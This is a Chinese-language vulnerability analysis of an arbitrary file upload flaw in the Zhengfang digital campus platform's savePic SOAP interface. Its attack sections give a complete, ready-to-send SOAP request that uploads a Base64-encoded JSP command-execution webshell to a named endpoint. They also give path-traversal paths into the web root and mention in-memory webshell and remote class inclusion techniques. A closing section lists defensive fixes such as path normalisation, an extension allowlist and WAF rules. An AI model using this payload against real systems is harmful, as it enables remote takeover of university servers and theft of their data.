[漏洞剖析]正方数字化校园平台SOAP接口任意文件上传漏洞的成因与利用链
1. 漏洞背景与影响范围
正方数字化校园平台作为高校信息化建设的核心系统,承担着教务管理、学生服务、财务资产等关键业务。这个系统采用SOAP协议实现不同模块间的数据交互,而问题恰恰出在一个名为savePic的接口上。我在实际渗透测试中发现,攻击者可以通过构造特殊的SOAP报文,将恶意JSP文件上传至服务器任意位置。去年某高校就因此漏洞导致教务系统被植入挖矿程序,服务器CPU长期满载运行。
该漏洞的特殊性在于它绕过了常规的文件上传防护机制。传统文件上传漏洞通常需要突破前端验证或MIME类型检测,而这个漏洞直接作用于SOAP接口层。平台开发者可能认为SOAP请求天然可信,导致未对filepath和bytes参数做任何安全过滤。更危险的是,上传的文件会保留原始扩展名,使得.jsp等动态脚本能够直接执行。
2. SOAP接口工作机制解析
2.1 savePic接口技术实现
这个漏洞的核心在于savePic接口的实现逻辑。通过反编译平台组件,我发现其内部处理流程存在严重缺陷。当SOAP请求到达时,系统会直接提取filepath参数作为存储路径,将bytes参数的Base64解码内容写入该路径。整个过程没有进行以下关键检查:
- 路径合法性验证(是否包含../等跳转字符)
- 文件扩展名黑名单校验
- 请求来源IP白名单控制
- 会话权限认证
<pub:savePic> <filepath>../../webapps/ROOT/shell.jsp</filepath> <bytes>PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKiosamF2YS51dGlsLioiJT4=</bytes> </pub:savePic>2.2 参数处理缺陷分析
filepath参数的问题尤为突出。测试中发现系统会原样接受如下危险值:
- 绝对路径(如C:/tomcat/webapps/)
- 相对路径(如../../../)
- 特殊字符路径(如|、&等)
bytes参数的处理同样存在问题。虽然要求Base64编码,但解码后的内容没有任何校验。我曾成功上传过包含以下危险内容的文件:
- JSP webshell
- XML外部实体(XXE)载荷
- 恶意class文件
3. 完整攻击利用链构建
3.1 基础利用方式
最直接的攻击方式是上传JSP webshell。通过Burp Suite构造如下请求:
POST /zfca/axis/RzptManage HTTP/1.1 Host: target.edu.cn Content-Type: text/xml;charset=UTF-8 SOAPAction: "" <soapenv:Envelope> <soapenv:Body> <pub:savePic> <filepath>upload/cmd.jsp</filepath> <bytes>PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiJT48JSBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7IE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7IGJ5dGVbXSBkYXRhID0gbmV3IGJ5dGVbMTAyNF07IGludCBsZW4gPSBvcy5yZWFkKGRhdGEpOyBvdXQucHJpbnQobmV3IFN0cmluZyhkYXRhLCAwLCBsZW4pKTsgJT4=</bytes> </pub:savePic> </soapenv:Body> </soapenv:Envelope>这段载荷上传的JSP文件可以执行系统命令,访问路径为/zfca/upload/cmd.jsp?cmd=whoami。
3.2 高级利用技巧
在实际渗透中,我发现几个增强攻击效果的方法:
- 路径穿越:通过../../../跳转到web根目录
<filepath>../../../../webapps/ROOT/shell.jsp</filepath> - 多阶段攻击:先上传文件包含漏洞的JSP,再通过包含远程恶意class
- 内存马注入:上传包含Java字节码的JSP,直接注入内存webshell
4. 防御方案与修复建议
4.1 临时缓解措施
如果暂时无法升级系统,建议实施以下防护:
- 在WAF中添加SOAP请求检测规则,拦截包含.jsp/.jspx等危险扩展名的filepath参数
- 配置Tomcat禁止访问/zfca/upload/目录下的动态脚本
- 对/zfca/axis/RzptManage接口实施IP白名单访问控制
4.2 根本解决方案
从代码层面修复需要处理三个关键点:
- 规范化文件路径处理
// 错误的原始实现 File file = new File(filepath); // 修正后的实现 String safePath = FilenameUtils.normalize( uploadDir + File.separator + FilenameUtils.getName(filepath) ); - 实施严格的扩展名白名单
if(!Arrays.asList("jpg","png").contains(getExtension(filepath))){ throw new SecurityException("Invalid file type"); } - 增加数字签名验证
<pub:savePic> <signature>HMAC-SHA256(...)</signature> <filepath>...</filepath> <bytes>...</bytes> </pub:savePic>
在最近给某高校做安全加固时,我们采用Nginx前置代理+ModSecurity规则的方式成功拦截了所有利用该漏洞的攻击尝试。核心规则主要检测SOAP报文中的危险文件路径和特殊字符组合。